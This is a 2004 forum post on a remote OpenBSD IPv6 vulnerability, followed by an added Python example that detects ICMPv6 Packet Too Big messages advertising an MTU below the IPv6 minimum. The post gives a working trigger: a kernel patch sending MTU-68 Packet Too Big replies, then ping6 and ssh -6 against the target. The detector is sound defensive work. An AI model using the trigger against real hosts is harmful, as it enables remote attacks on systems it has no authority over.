Remote OpenBSD vulnerability

    Don't see these very often (although it's certainly happened more than once, contrary to their claims) and only applies to OpenBSD systems on IPv6 networks, but still, interesting.

    I'm not 100% clear on the details, but it appears to be some sort of race condition involving receiving a low-MTU ICMP datagram then initiating a TCP/IPv6 connection.

    To exploit this vulnerability, you will need a Linux system. Edit Linux 2.4.24's net/ipv6/icmp.c and change the following:

    case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
    icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

    Recompile. Reboot.

    ping6 openbsd
    ssh -6 openbsd

    The vulnerability discoverer's writeup is a little bit less than scholarly:
    Last edited by bascule; February 5, 2004, 16:13.
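The post's trigger is an ICMPv6 Packet Too Big message carrying an MTU far below anything legitimate (68 bytes, where the IPv6 minimum link MTU is 1280). The following is an added example, not code from the post or from OpenBSD, showing how a defender could flag such messages in captured traffic; the sample frames are constructed inline and the IPv6 addresses are made up.

```python
import struct

IPV6_MIN_MTU = 1280       # RFC 2460/8200: every IPv6 link must carry 1280-byte packets
IPPROTO_ICMPV6 = 58
ICMPV6_PKT_TOOBIG = 2

def parse_packet_too_big(frame: bytes):
    """Return the advertised MTU if `frame` is an IPv6 packet carrying an
    ICMPv6 Packet Too Big message, else None. Only the fixed 40-byte IPv6
    header is handled (no extension headers), which suffices for this check."""
    if len(frame) < 40 or frame[0] >> 4 != 6:
        return None
    payload_len, next_hdr = struct.unpack("!HB", frame[4:7])
    if next_hdr != IPPROTO_ICMPV6:
        return None
    icmp = frame[40:40 + payload_len]
    if len(icmp) < 8 or icmp[0] != ICMPV6_PKT_TOOBIG:
        return None
    (mtu,) = struct.unpack("!I", icmp[4:8])   # MTU field follows type/code/checksum
    return mtu

def is_suspicious_ptb(frame: bytes) -> bool:
    """True when a Packet Too Big message advertises an MTU below the IPv6
    minimum; no conforming router ever sends one, so it warrants an alert."""
    mtu = parse_packet_too_big(frame)
    return mtu is not None and mtu < IPV6_MIN_MTU

def build_ptb(mtu: int, src: bytes, dst: bytes) -> bytes:
    """Constructed sample frame: IPv6 header + ICMPv6 Packet Too Big with an
    8-byte stub of the invoking packet. Checksum is left zero; it is not verified here."""
    invoking = b"\x60" + b"\x00" * 7
    icmp = struct.pack("!BBHI", ICMPV6_PKT_TOOBIG, 0, 0, mtu) + invoking
    ip6 = struct.pack("!IHBB", 0x60000000, len(icmp), IPPROTO_ICMPV6, 64) + src + dst
    return ip6 + icmp

# Made-up link-local addresses for the constructed samples
SRC = bytes.fromhex("fe80000000000000000000000000000a")
DST = bytes.fromhex("fe80000000000000000000000000000b")
TOO_SMALL = build_ptb(68, SRC, DST)    # the 68-byte MTU from the post: should alert
NORMAL = build_ptb(1400, SRC, DST)     # ordinary path-MTU message: should not alert
```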